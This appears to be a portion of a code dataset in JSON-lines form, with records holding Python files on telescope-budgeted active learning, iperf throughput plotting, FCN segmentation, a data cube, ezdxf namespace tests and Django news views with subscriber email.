queryable_ids,\n pool_metadata, budgets, criteria):\n \"\"\"Select batch of queries based on acquistion criteria. Independently\n models the elements of the batch.\n\n Parameters\n ----------\n class_prob: np.array\n Classification probability. One value per class per object.\n id_name: str\n key to index ids from pool_metadata\n queryable_ids: np.array\n Set of ids for objects available for querying.\n pool_metadata: pandas Dataframe\n Contains infromation relevant to the poolset such as costs and ids.\n budgets: tuple of ints\n budgets for each of the telescopes assumes 0th index is for 4m and\n 1th index is for 8m.\n criteria: str\n Acqution strategy to use can be 'uncertainty', 'entropy', 'margin',\n 'least_confident' and 'random'.\n\n Returns\n -------\n acquistion_index: list\n List of indexes identifying the objects from the pool sampled to be\n queried. Guranteed to be within budget.\n \"\"\"\n pool_ids = pool_metadata[id_name].values\n budget_4m = budgets[0]\n budget_8m = budgets[1]\n index_to_ids = {i: q_id for i, q_id in enumerate(queryable_ids)}\n ids_to_index = {i_d: i for i, i_d in enumerate(pool_metadata['id'].values)}\n pool_query_filter = np.array([p_id in queryable_ids for p_id in pool_ids])\n\n cost_4m = pool_metadata['cost_4m'].values[pool_query_filter]\n cost_8m = pool_metadata['cost_8m'].values[pool_query_filter]\n cost_4m[cost_4m >= 9999.0] = 1e8\n cost_8m[cost_8m >= 9999.0] = 1e8\n possible_4m = cost_4m < 1e8\n possible_8m = cost_8m < 1e8\n query_ids = pool_ids[pool_query_filter]\n\n class_probs = class_probs[pool_query_filter]\n\n if criteria == 'uncertainty':\n score = abs(class_probs[:, 1] - 0.5)\n reversed = False\n elif criteria == 'entropy':\n entropies = (-1*np.sum(class_probs * np.log(class_probs + 1e-12), axis=1))\n score = entropies\n reversed = True\n elif criteria == 'margin':\n sorted_probs = np.sort(class_probs, axis=1)\n score = sorted_probs[:, -1] - sorted_probs[:, -2]\n reversed = False\n elif criteria == 'least_confident':\n score = class_probs.max(axis=1)\n reversed = False\n elif criteria == 'random':\n score = np.random.rand(class_probs.shape[0])\n reversed = False\n\n cost_4m_possible = cost_4m[possible_4m]\n score_4m = score[possible_4m]\n if reversed:\n order_4m = score_4m.argsort()[::-1]\n else:\n order_4m = score_4m.argsort()\n\n cost_4m_order = cost_4m_possible[order_4m]\n query_ids_4m_possible = query_ids[possible_4m][order_4m]\n\n # Record acquistions as IDs\n acquistions_4m = []\n total_cost_4m = 0.\n for q_id, c_4m in zip(query_ids_4m_possible, cost_4m_order):\n if (total_cost_4m + c_4m) < budget_4m:\n acquistions_4m.append(q_id)\n total_cost_4m += c_4m\n\n acquistions = acquistions_4m.copy()\n\n cost_8m_possible = cost_8m[possible_8m]\n score_8m = score[possible_8m]\n if reversed:\n order_8m = score_8m.argsort()[::-1]\n else:\n order_8m = score_8m.argsort()\n\n cost_8m_order = cost_8m_possible[order_8m]\n query_ids_8m_possible = query_ids[possible_8m][order_8m]\n\n acquistions_8m = []\n total_cost_8m = 0.\n for q_id, c_8m in zip(query_ids_8m_possible, cost_8m_order):\n if (total_cost_8m + c_8m) < budget_8m and (q_id not in acquistions):\n acquistions_8m.append(q_id)\n total_cost_8m += c_8m\n\n acquistions += acquistions_8m\n\n if total_cost_4m > budget_4m:\n raise RuntimeError(\"4m Budget exceeded\")\n if total_cost_8m > budget_8m:\n raise RuntimeError(\"8m Budget exceeded\")\n if len(acquistions) != len(set(acquistions)):\n raise RuntimeError(\"Some acquistions were repeated\")\n if len(set(acquistions_4m) & set(acquistions_8m)) != 
0:\n raise RuntimeError(\"Object acquired by both telescopes\")\n\n acquistion_index = []\n for q_id in acquistions:\n acquistion_index.append(ids_to_index[q_id])\n\n return acquistion_index\n\ndef batch_queries_mi_entropy(probs_B_K_C, id_name, queryable_ids,\n pool_metadata, budgets, criteria=\"MI\" ):\n \"\"\"Select batch of queries based on acquistion criteria. Jointly models the\n elements of the batch.\n\n Parameters\n ----------\n probs_B_K_C: np.array\n Classification probabilitity distributions for each datapoint for each\n model in the committee (or sample from model posterior). B is the number\n of data points, K is the committee size and C is the number of classes.\n id_name: str\n key to index ids from pool_metadata\n queryable_ids: np.array\n Set of ids for objects available for querying.\n pool_metadata: pandas Dataframe\n Contains infromation relevant to the poolset such as costs and ids.\n budgets: tuple of ints\n budgets for each of the telescopes assumes 0th index is for 4m and\n 1th index is for 8m.\n criteria: str\n Acqution strategy to use can be 'uncertainty', 'entropy', 'margin',\n 'least_confident' and 'random'.\n\n Returns\n -------\n acquistion_index: list\n List of indexes identifying the objects from the pool sampled to be\n queried. Guranteed to be within budget.\n \"\"\"\n pool_ids = pool_metadata[id_name].values\n # Specifically queryable ids since we don't need ids to the pool in general.\n index_to_ids = {i: q_id for i, q_id in enumerate(queryable_ids)}\n ids_to_index = {i_d: i for i, i_d in enumerate(pool_metadata['id'].values)}\n pool_query_filter = np.array([p_id in queryable_ids for p_id in pool_ids])\n\n cost_4m = pool_metadata['cost_4m'].values[pool_query_filter]\n cost_8m = pool_metadata['cost_8m'].values[pool_query_filter]\n cost_4m[cost_4m >= 9999.0] = np.inf\n cost_8m[cost_8m >= 9999.0] = np.inf\n\n # For numerical reasons ie divide by zero etc.\n probs_B_K_C = probs_B_K_C[pool_query_filter]\n probs_B_K_C += 1.e-12\n\n conditional_entropies_B = compute_conditional_entropies_B(probs_B_K_C)\n B, K, C = probs_B_K_C.shape\n num_samples_per_ws = 40000 // K\n num_samples = num_samples_per_ws * K\n\n budget_4m = budgets[0]\n budget_8m = budgets[1]\n acquistions = []\n acquistions_4m = []\n acquistions_8m = []\n total_cost_4m = 0.\n total_cost_8m = 0.\n scores = []\n prev_joint_probs_M_K = None\n prev_samples_M_K = None\n top_scores = []\n\n is_time = True\n i = 0\n while is_time:\n #print(i)\n exact_samples = C ** i\n if exact_samples <= num_samples:\n if len(acquistions) == 0:\n joint_entropies_B = exact_batch(probs_B_K_C)\n else:\n prev_joint_probs_M_K = joint_probs_M_K(probs_B_K_C[acquistions[-1][None]], prev_joint_probs_M_K)\n joint_entropies_B = exact_batch(probs_B_K_C, prev_joint_probs_M_K)\n else:\n # Clear memory will be using sampling method from here on out.\n prev_joint_probs_M_K = None\n prev_samples_M_K = sample_M_K(probs_B_K_C[acquistions], S=num_samples_per_ws)\n joint_entropies_B = batch_sample(probs_B_K_C, prev_samples_M_K)\n\n if criteria == 'MI':\n batch_scores = joint_entropies_B - conditional_entropies_B\n #print(batch_scores.max())\n batch_scores = batch_scores - np.sum(conditional_entropies_B[acquistions])\n #print(batch_scores.max())\n elif criteria == 'entropy':\n batch_scores = joint_entropies_B\n\n # Adjust scores for cost\n scores_4m = batch_scores / cost_4m\n scores_4m[~np.isfinite(scores_4m)] = -np.inf\n scores_8m = batch_scores / cost_8m\n scores_8m[~np.isfinite(scores_8m)] = -np.inf\n\n scores_4m[acquistions] = -1 * 
np.inf\n scores_8m[acquistions] = -1 * np.inf\n\n # What objects can be observered within budget\n possible_4m = (cost_4m + total_cost_4m) <= budget_4m\n possible_4m[~np.isfinite(scores_4m)] = False\n possible_8m = (cost_8m + total_cost_8m) <= budget_8m\n possible_8m[~np.isfinite(scores_8m)] = False\n\n sorted_4m_idx = scores_4m.argsort()[::-1]\n possible_4m_order = np.where(possible_4m[sorted_4m_idx])[0]\n\n sorted_8m_idx = scores_8m.argsort()[::-1]\n possible_8m_order = np.where(possible_8m[sorted_8m_idx])[0]\n\n if np.any(possible_4m) and np.any(possible_8m):\n #print(\"BOTH POSSIBLE\")\n top_4m_score = scores_4m[sorted_4m_idx[possible_4m_order]][0]\n top_8m_score = scores_8m[sorted_8m_idx[possible_8m_order]][0]\n if top_4m_score >= top_8m_score:\n #print(\"Choose 4m\")\n top_score = top_4m_score\n selection = sorted_4m_idx[possible_4m_order][0]\n acquistions_4m.append(selection)\n total_cost_4m += cost_4m[selection]\n else:\n #print(\"Choose 8m\")\n top_score = top_8m_score\n selection = sorted_8m_idx[possible_8m_order][0]\n acquistions_8m.append(selection)\n total_cost_8m += cost_8m[selection]\n\n elif np.any(possible_4m) and not np.any(possible_8m):\n #print(\"Only 4m possible\")\n top_4m_score = scores_4m[sorted_4m_idx[possible_4m_order]][0]\n top_score = top_4m_score\n selection = sorted_4m_idx[possible_4m_order][0]\n acquistions_4m.append(selection)\n total_cost_4m += cost_4m[selection]\n\n elif not np.any(possible_4m) and np.any(possible_8m):\n #print(\"Only 8m possible\")\n top_8m_score = scores_8m[sorted_8m_idx[possible_8m_order]][0]\n top_score = top_8m_score\n selection = sorted_8m_idx[possible_8m_order][0]\n acquistions_8m.append(selection)\n total_cost_8m += cost_8m[selection]\n\n elif not np.any(possible_4m) and not np.any(possible_8m):\n #print(\"Budget Full\")\n is_time = False\n continue\n\n acquistions.append(selection)\n scores.append(batch_scores[selection])\n i += 1\n top_scores.append(top_score)\n #print(\"TOP SCORE: {}\".format(top_score))\n #print(acquistions[-1], total_cost_4m, total_cost_8m)\n #print()\n\n if total_cost_4m > budget_4m:\n raise RuntimeError(\"4m Budget exceeded\")\n if total_cost_8m > budget_8m:\n raise RuntimeError(\"8m Budget exceeded\")\n if len(acquistions) != len(set(acquistions)):\n raise RuntimeError(\"Some acquistions were repeated\")\n if len(set(acquistions_4m) & set(acquistions_8m)) != 0:\n raise RuntimeError(\"Object acquired by both telescopes\")\n\n acquistion_ids = []\n for index in acquistions:\n acquistion_ids.append(index_to_ids[index])\n\n acquistion_indexes = []\n for p_id in acquistion_ids:\n acquistion_indexes.append(ids_to_index[p_id])\n\n return acquistion_indexes\n","repo_name":"COINtoolbox/RESSPECT","sub_path":"resspect/query_budget_strategies.py","file_name":"query_budget_strategies.py","file_ext":"py","file_size_in_byte":11144,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"6794629238","text":"import numpy as np\nimport os\nimport argparse\nimport matplotlib\nmatplotlib.rcParams['pdf.fonttype'] = 42\nfrom matplotlib import pyplot as plt\n\nDATA_PATHS = {\n \"a\": [\"mob_att_mp.txt\", \"mob_att_sp_mob.txt\", \"mob_att_sp_att.txt\"],\n \"b\": [\"mob_vz_mp.txt\", \"mob_vz_sp_mob.txt\", \"mob_vz_sp_vz.txt\"]\n}\n\nLABELS = {\n \"a\": [\"MPTCP\", \"MOB\", \"ATT\"],\n \"b\": [\"MPTCP\", \"MOB\", \"VZ\"]\n}\n\n\ndef parse_iperf(data_path):\n timestamp, throughput = [], []\n with open(data_path) as f:\n lines = f.readlines()\n\n while not \"sec \" in lines[0]:\n 
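Aside: a few lines below, the parse_iperf.py record maps iperf's G/M/K bandwidth suffixes onto a common Mbps scale with a chain of suffix checks. A compact standalone sketch of that normalization under the same scaling rules; the name to_mbps is illustrative, not from the record:

def to_mbps(value, unit):
    # iperf prints e.g. "1.5 Gbits/sec"; scale everything to Mbits/sec.
    # Unrecognized prefixes fall back to plain bits/sec, as in the record.
    scale = {"G": 1000.0, "M": 1.0, "K": 1e-3}.get(unit[0], 1e-6)
    return float(value) * scale

assert to_mbps("1.5", "Gbits/sec") == 1500.0
assert to_mbps("42", "Mbits/sec") == 42.0
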
lines.pop(0)\n while \"sec \" in lines[0]:\n line = lines.pop(0)\n line_seg = line.split()\n line_seg = line_seg[line_seg.index(\"sec\")-1:]\n timestamp.append(float(line_seg[0].split('-')[0]))\n if 'G' in line_seg[5]:\n throughput.append(float(line_seg[4])*1000)\n elif 'M' in line_seg[5]:\n throughput.append(float(line_seg[4])) # Mbps\n elif 'K' in line_seg[5]:\n throughput.append(float(line_seg[4])/1000)\n else:\n throughput.append(float(line_seg[4])/1000000)\n\n return timestamp, throughput\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-f\", \"--fig\", type=str, default=\"a\", help='figure number (a or b)')\n args = parser.parse_args()\n fig = args.fig.lower()\n\n timestamps, results = [], []\n for data_path in DATA_PATHS[fig]:\n timestamp, result = parse_iperf(data_path)\n timestamps.append(timestamp)\n results.append(result)\n\n plt.rcParams.update({'font.size': 18})\n plt.figure(figsize=(10,4))\n plt.xlabel(\"Time (s)\")\n plt.ylabel(\"Throughput (Mbps)\")\n labels = LABELS[fig]\n for i, (timestamp, result) in enumerate(zip(timestamps, results)):\n plt.plot(timestamp, result, label=labels[i], linewidth=1.8)\n plt.legend()\n plt.grid(True, linestyle='--')\n plt.tight_layout()\n plt.savefig(f\"mptcp_mob_{LABELS[fig][-1]}.pdf\")\n","repo_name":"Starlink-Project/Satellite-vs-Cellular","sub_path":"11-MPTCP-Thrpt/parse_iperf.py","file_name":"parse_iperf.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"9025346708","text":"from Package.Task.Segmentation.SemanticSegmentation.D2.Dev import DevModel\nimport torch\nimport torchvision.models as models\nimport torch.nn as nn\nfrom typing import Union\n\n\nclass FCNResNet101Net(nn.Module):\n def __init__(\n self,\n pre_trained: bool = False,\n num_classes: int = 21,\n ):\n super().__init__()\n self.__model = models.segmentation.fcn_resnet101(\n pretrained=pre_trained,\n num_classes=num_classes\n )\n\n def forward(\n self,\n x: torch.Tensor\n ):\n res = self.__model(x)\n return res['out']\n\n\ndef get_fcn_resnet101(\n pre_trained: bool = False,\n num_classes: int = 21,\n) -> FCNResNet101Net:\n return FCNResNet101Net(\n pre_trained,\n num_classes,\n )\n\n\nclass FCNResNet101Model(DevModel):\n def __init__(\n self,\n net: Union[nn.Module, FCNResNet101Net]\n ):\n super().__init__(net)\n\n def forward(\n self,\n x: torch.Tensor,\n *args,\n **kwargs\n ):\n return self.net(x)\n\n\ndef de_bug_model():\n x = torch.rand(size=(1, 3, 448, 448))\n m = get_fcn_resnet101(True, 21)\n y = m(x)\n # print(m)\n print(y.shape)\n print(y)\n\n\nif __name__ == '__main__':\n de_bug_model()\n","repo_name":"diyage/AllYouNeed","sub_path":"Demo/fcn_resnet101_semantic_segmentation/other/Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"12313801765","text":"import json\nfrom collections import OrderedDict\n\n\nclass Cube(object):\n def __init__(self, dimensions):\n super().__init__()\n self.dimensions = dimensions\n self.cube = {}\n self.dictionaries = {}\n\n self._current_cells = {} # a dictionary dim->cell for the current fact\n\n @staticmethod\n def _get(fact, key):\n if callable(key):\n return key(fact)\n else:\n return fact[key]\n\n @staticmethod\n def _value(fact, dimension):\n \"\"\"\n Extract dimension value from fact.\n :param fact: The fact object, i.e. 
dict.\n :param dimension: The dimension specification.\n :returns: Tuple with the object that the values was directly taken from and the value.\n \"\"\"\n # determine parent based on parent key or parent function\n if \"parent\" in dimension:\n parent = Cube._get(fact, dimension[\"parent\"])\n else:\n parent = fact\n\n # use value function if there is one\n if callable(dimension[\"value\"]):\n return parent, dimension[\"value\"](parent)\n\n # determine parent based on qualified value key\n key = dimension[\"value\"]\n key_items = key.split(\".\")\n for key_item in key_items[:-1]:\n if parent is None:\n break\n parent = parent[key_item]\n\n # determine value\n if parent is None:\n value = None\n else:\n value = parent[key_items[-1]]\n\n return parent, value\n\n @staticmethod\n def _normalize(value):\n str_value = str(value)\n return str_value.replace(\"$\", \"&#FF04;\").replace(\".\", \"&#FF0E;\")\n\n def _cell(self, fact):\n cell = self.cube\n for dimension in self.dimensions:\n parent, value = self._value(fact, dimension)\n value = self._normalize(value)\n self._current_cells[dimension[\"name\"]] = cell, value\n is_new = value not in cell\n cell = cell.setdefault(value, {})\n\n if value is not None and is_new and \"dictionary\" in dimension:\n dictionary_spec = dimension[\"dictionary\"]\n dictionary = self.dictionaries.setdefault(dictionary_spec[\"dictionary\"], {})\n dictionary_key = self._normalize(self._get(parent, dictionary_spec[\"key\"]))\n dictionary[dictionary_key] = self._get(parent, dictionary_spec[\"value\"])\n\n return cell\n\n def add_fact(self, fact):\n cell = self._cell(fact)\n current = cell.get(\"_\", 0)\n cell[\"_\"] = current + 1\n\n def remove_fact(self, fact):\n cell = self._cell(fact)\n current = cell.get(\"_\", 0)\n if current == 0:\n # TODO clients should be warned about this situation\n pass\n cell[\"_\"] = current - 1\n\n if current == 1:\n # the cell is empty now, it can be removed\n del(cell[\"_\"])\n for dimension in reversed(self.dimensions):\n if len(cell) == 0:\n parent_cell, value = self._current_cells[dimension[\"name\"]]\n del(parent_cell[value])\n cell = parent_cell\n else:\n break\n\n def to_json(self):\n data = OrderedDict(dimensions=[dimension[\"name\"] for dimension in self.dimensions],\n cube=self.cube, dictionaries=self.dictionaries)\n return json.dumps(data, indent=2)\n\n","repo_name":"markus1978/cubefilter-python","sub_path":"cubefilter/cubefilter.py","file_name":"cubefilter.py","file_ext":"py","file_size_in_byte":3463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70791145768","text":"import pytest\nfrom copy import deepcopy\nfrom ezdxf.math import Vector\nfrom ezdxf.entities.dxfentity import base_class, DXFAttributes, DXFNamespace, SubclassProcessor\nfrom ezdxf.entities.dxfgfx import acdb_entity\nfrom ezdxf.entities.line import acdb_line\nfrom ezdxf.lldxf.extendedtags import ExtendedTags\nfrom ezdxf.lldxf.const import DXFAttributeError\nfrom ezdxf.lldxf.tagwriter import TagCollector\n\n\nclass DXFEntity:\n \"\"\" Mockup \"\"\"\n DXFTYPE = 'DXFENTITY'\n DXFATTRIBS = DXFAttributes(base_class, acdb_entity, acdb_line)\n\n\n@pytest.fixture\ndef entity():\n return DXFEntity()\n\n\n@pytest.fixture\ndef processor():\n return SubclassProcessor(ExtendedTags.from_text(TEST_1))\n\n\ndef test_handle_and_owner(entity, processor):\n attribs = DXFNamespace(processor, entity)\n assert attribs.handle == 'FFFF'\n assert attribs.owner == 'ABBA'\n assert attribs._entity is entity\n\n\ndef 
test_default_values(entity, processor):\n attribs = DXFNamespace(processor, entity)\n assert attribs.layer == '0'\n assert attribs.color == 256\n assert attribs.linetype == 'BYLAYER'\n # this attributes do not really exist\n assert attribs.hasattr('layer') is False\n assert attribs.hasattr('color') is False\n assert attribs.hasattr('linetype') is False\n\n\ndef test_get_value_with_default(entity, processor):\n attribs = DXFNamespace(processor, entity)\n # return existing values\n assert attribs.get('handle', '0') == 'FFFF'\n # return given default value not DXF default value, which would be '0'\n assert attribs.get('layer', 'mozman') == 'mozman'\n # attribute has to a valid DXF attribute\n with pytest.raises(DXFAttributeError):\n _ = attribs.get('hallo', 0)\n\n # attribs without default returns None -> will not exported to DXF file\n assert attribs.color_name is None\n\n\ndef test_set_values(entity, processor):\n attribs = DXFNamespace(processor, entity)\n attribs.handle = 'CDEF'\n assert attribs.handle == 'CDEF'\n attribs.set('owner', 'DADA')\n assert attribs.owner == 'DADA'\n # set new attribute\n attribs.color = 7\n assert attribs.color == 7\n attribs.set('linetype', 'DOT')\n assert attribs.linetype == 'DOT'\n # attribute has to a valid DXF attribute\n with pytest.raises(DXFAttributeError):\n attribs.hallo = 0\n with pytest.raises(DXFAttributeError):\n attribs.set('hallo', 0)\n\n\ndef test_value_types(entity, processor):\n attribs = DXFNamespace(processor, entity)\n attribs.handle = None # None is always accepted, attribute is ignored at export\n assert attribs.handle is None\n attribs.handle = 'XYZ'\n assert attribs.handle == 'XYZ', 'handle is just a string'\n attribs.handle = 123\n assert attribs.handle == '123', 'handle is just a string'\n with pytest.raises(ValueError):\n attribs.color = 'xxx'\n\n attribs.start = (1, 2, 3) # type: Vector\n assert attribs.start == (1, 2, 3)\n assert attribs.start.x == 1\n assert attribs.start.y == 2\n assert attribs.start.z == 3\n\n\ndef test_delete_attribs(entity, processor):\n attribs = DXFNamespace(processor, entity)\n attribs.layer = 'mozman'\n assert attribs.layer == 'mozman'\n del attribs.layer\n\n # default value\n assert attribs.layer == '0'\n with pytest.raises(DXFAttributeError):\n del attribs.color\n attribs.discard('color') # delete silently if not exists\n with pytest.raises(DXFAttributeError):\n del attribs.color\n\n\ndef test_is_supported(entity, processor):\n attribs = DXFNamespace(processor, entity)\n assert attribs.is_supported('linetype') is True\n assert attribs.is_supported('true_color') is True # ezdxf does not care about DXF versions at runtime\n assert attribs.is_supported('xxx_mozman_xxx') is False\n\n\ndef test_dxftype(entity, processor):\n attribs = DXFNamespace(processor, entity)\n assert attribs.dxftype == 'DXFENTITY'\n\n\ndef test_cloning(entity, processor):\n attribs = DXFNamespace(processor, entity)\n attribs.color = 77\n attribs2 = attribs.copy(entity)\n # clone everything\n assert attribs2._entity is attribs._entity\n assert attribs2.handle is attribs.handle\n assert attribs2.owner is attribs.owner\n assert attribs2.color == 77\n # do not harm original entity\n assert attribs._entity is entity\n assert attribs.handle == 'FFFF'\n assert attribs.owner == 'ABBA'\n # change clone\n attribs2.color = 13\n assert attribs.color == 77\n assert attribs2.color == 13\n\n\ndef test_deepcopy_usage(entity, processor):\n attribs = DXFNamespace(processor, entity)\n attribs.color = 77\n\n attribs2 = deepcopy(attribs)\n # clone 
everything\n assert attribs2._entity is attribs._entity\n assert attribs2.handle is attribs.handle\n assert attribs2.owner is attribs.owner\n assert attribs2.color == 77\n # do not harm original entity\n assert attribs._entity is entity\n assert attribs.handle == 'FFFF'\n assert attribs.owner == 'ABBA'\n # change clone\n attribs2.color = 13\n assert attribs.color == 77\n assert attribs2.color == 13\n\n\ndef test_dxf_export_one_attribute(entity, processor):\n attribs = DXFNamespace(processor, entity)\n tagwriter = TagCollector()\n attribs.export_dxf_attribs(tagwriter, 'handle')\n assert len(tagwriter.tags) == 1\n assert tagwriter.tags[0] == (5, 'FFFF')\n with pytest.raises(DXFAttributeError):\n attribs.export_dxf_attribute(tagwriter, 'mozman')\n\n\ndef test_dxf_export_two_attribute(entity, processor):\n attribs = DXFNamespace(processor, entity)\n tagwriter = TagCollector()\n attribs.export_dxf_attribs(tagwriter, ['handle', 'owner'])\n assert len(tagwriter.tags) == 2\n assert tagwriter.tags[0] == (5, 'FFFF')\n assert tagwriter.tags[1] == (330, 'ABBA')\n\n\ndef test_load_doublettes():\n from ezdxf.lldxf.attributes import DefSubclass, DXFAttr\n from ezdxf.lldxf.tags import Tags, DXFTag\n subclass = DefSubclass('AcDbTest', {\n 'test1': DXFAttr(1),\n 'test2': DXFAttr(2),\n 'test3': DXFAttr(1), # same group code for different attribute\n })\n\n class TestEntity(DXFEntity):\n DXFATTRIBS = DXFAttributes(subclass)\n\n data = Tags([\n DXFTag(1, '1'),\n DXFTag(2, '2'),\n DXFTag(1, '3'),\n ])\n ns = DXFNamespace(entity=TestEntity())\n SubclassProcessor.load_tags_into_namespace(ns, data, subclass)\n assert ns.test1 == '1'\n assert ns.test2 == '2'\n assert ns.test3 == '3'\n\n\nTEST_1 = \"\"\"0\nDXFENTITY\n5\nFFFF\n330\nABBA\n\"\"\"\n\nif __name__ == '__main__':\n pytest.main([__file__])\n","repo_name":"DatacloudIntl/dc_ezdxf","sub_path":"tests/test_01_dxf_entities/test_101_dxfnamespace.py","file_name":"test_101_dxfnamespace.py","file_ext":"py","file_size_in_byte":6502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20595112027","text":"from django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib.auth.models import User\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth.mixins import PermissionRequiredMixin\nfrom django.contrib.auth.decorators import permission_required, login_required\nfrom django.core.mail import send_mail\n# Create your views here.\nfrom datetime import datetime\n\nfrom django.urls import reverse_lazy\nfrom django.views import View\nfrom django.views.generic import ListView, DetailView, UpdateView, DeleteView, CreateView, TemplateView\nfrom .models import Post\nfrom .models import Category\nfrom pprint import pprint\nfrom .filters import PostFilter, ArticlesFilter\n\nfrom .forms import NewForm\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\nfrom .tasks import hello, send_mail_every_week, send_mail_post_save\nfrom django.views.decorators.cache import cache_page\nfrom django.core.cache import cache\n\nfrom django.utils.translation import gettext as _\n\n\nclass Index(View):\n def get(self, request):\n string = _('Hello word')\n\n return HttpResponse(string)\n\n\nclass CategoryList(LoginRequiredMixin, ListView):\n model = Category\n ordering = 'name'\n template_name = 'category.html'\n context_object_name = 'category'\n\n\n@login_required\ndef add_subscribe(request, pk):\n user = 
request.user\n selectedCat = Category.objects.get(pk=pk)\n selectedCat.subscribers.add(user)\n return render(request, 'subscribe.html', context={'user': user, 'selectedCat': selectedCat})\n\n\n# Все новости\nclass NewsList(LoginRequiredMixin, ListView):\n model = Post\n ordering = '-ti'\n template_name = 'news.html'\n context_object_name = 'posts'\n paginate_by = 10\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['time_now'] = datetime.utcnow()\n context['next_sale'] = None\n context['is_not_authors'] = not self.request.user.groups.filter(name='authors').exists()\n return context\n\n\n# Хочу отфильтровать только по статье, чтобы потом сделать навигацию. Без ввода пользователя\ndef articles_list(request):\n filter_categoryType = ArticlesFilter(request.GET, queryset=Post.objects.all())\n context = render(request, 'articles.html', {'filter': filter_categoryType})\n return context\n\n\nclass ArticlesListSearch(LoginRequiredMixin, ListView):\n model = Post\n ordering = '-ti'\n template_name = 'articles.html'\n context_object_name = 'articles'\n\n # Переопределяем функцию списка новостей\n def get_queryset(self):\n queryset = super().get_queryset()\n self.filterset = ArticlesFilter(self.request.GET, queryset)\n return self.filterset.qs\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['time_now'] = datetime.utcnow()\n context['filterset'] = self.filterset\n context['is_not_authors'] = not self.request.user.groups.filter(name='authors').exists()\n return context\n\n\n# Поиск с формой\nclass PostListSearch(LoginRequiredMixin, ListView):\n model = Post\n ordering = '-ti'\n template_name = 'newsSearch.html'\n context_object_name = 'posts'\n\n # Переопределяем функцию списка новостей\n def get_queryset(self):\n queryset = super().get_queryset()\n self.filterset = PostFilter(self.request.GET, queryset)\n return self.filterset.qs\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['time_now'] = datetime.utcnow()\n context['filterset'] = self.filterset\n context['is_not_authors'] = not self.request.user.groups.filter(name='authors').exists()\n return context\n\n\n# Одна новость\nclass NewsDetail(LoginRequiredMixin, DetailView):\n model = Post\n template_name = 'new.html'\n context_object_name = 'new'\n\n def get_object(self, *args, **kwargs): # переопределяем метод получения объекта, как ни странно\n obj = cache.get(f'post-{self.kwargs[\"pk\"]}',\n None) # кэш очень похож на словарь, и метод get действует так же. 
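Aside: the Russian comment here (it continues on the next line) translates to: "the cache is very much like a dictionary, and its get method works the same way: it fetches the value by key, and if the key is absent it returns None." The surrounding get_object override is the classic cache-aside pattern. A minimal framework-free sketch; the names cached_get and DictCache are illustrative, not Django API:

def cached_get(cache, key, load):
    # Cache-aside: try the cache first; on a miss, call the loader and
    # populate the cache so the next lookup is a hit.
    obj = cache.get(key)
    if obj is None:
        obj = load()
        cache.set(key, obj)
    return obj

class DictCache:
    # Tiny stand-in exposing the same get/set surface the record relies on.
    def __init__(self):
        self._data = {}
    def get(self, key):
        return self._data.get(key)
    def set(self, key, value):
        self._data[key] = value

cache = DictCache()
assert cached_get(cache, "post-1", lambda: "loaded") == "loaded"
assert cached_get(cache, "post-1", lambda: "MISS") == "loaded"  # served from cache
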
Он забирает значение по ключу, если его нет, то забирает None.\n\n # если объекта нет в кэше, то получаем его и записываем в кэш\n if not obj:\n obj = super().get_object(queryset=self.queryset)\n cache.set(f'post-{self.kwargs[\"pk\"]}', obj)\n\n return obj\n\n\n# Одна статья\nclass ArticleDetail(LoginRequiredMixin, DetailView):\n model = Post\n template_name = 'article.html'\n context_object_name = 'article'\n\n\n# Создать новость\n@permission_required('news.add_post')\ndef create_news(request):\n current_user = request.user\n if current_user.is_authenticated:\n form = NewForm()\n if request.method == 'POST':\n form = NewForm(request.POST)\n# date = datetime.strptime(request.POST['date'], '%Y-%m-%d')\n mail = current_user.email\n title = request.POST['title']\n text = request.POST['content']\n postCategory = request.POST['postCategory']\n cat = Category.objects.get(id=postCategory)\n users = cat.subscribers.all()\n if form.is_valid():\n categoryType = form.save(commit=False)\n categoryType.categoryType = 'NW'\n categoryType.save()\n '''\n if current_user in users:\n send_mail(\n subject=f'Hello, {current_user.username} . New article in your favorite section!».',\n message=f'{text[:50]} \\n'\n f' Ссылка http://127.0.0.1:8000/news/{categoryType.id}',\n\n from_email='marija.utochkina@yandex.ru',\n recipient_list=[mail],\n )\n '''\n send_mail_post_save.delay(categoryType.id)\n\n return HttpResponseRedirect('/news/')\n\n return render(request, 'new_edit.html', {'form': form})\n\n else:\n return HttpResponseRedirect('/news/')\n\n\n# Создать статью\n@permission_required('news.add_post')\ndef create_news1(request):\n current_user = request.user\n if current_user.is_authenticated:\n form = NewForm()\n if request.method == 'POST':\n form = NewForm(request.POST)\n# current_date = datetime.strptime(request.POST['date'], '%Y-%m-%d'),\n mail = current_user.email\n title = request.POST['title']\n text = request.POST['content']\n postCategory = request.POST['postCategory']\n cat = Category.objects.get(id=postCategory)\n users = cat.subscribers.all()\n\n if form.is_valid():\n categoryType = form.save(commit=False)\n categoryType.categoryType = 'AR'\n categoryType.save()\n if current_user in users:\n send_mail(\n subject=f'Hello, {current_user.username} . 
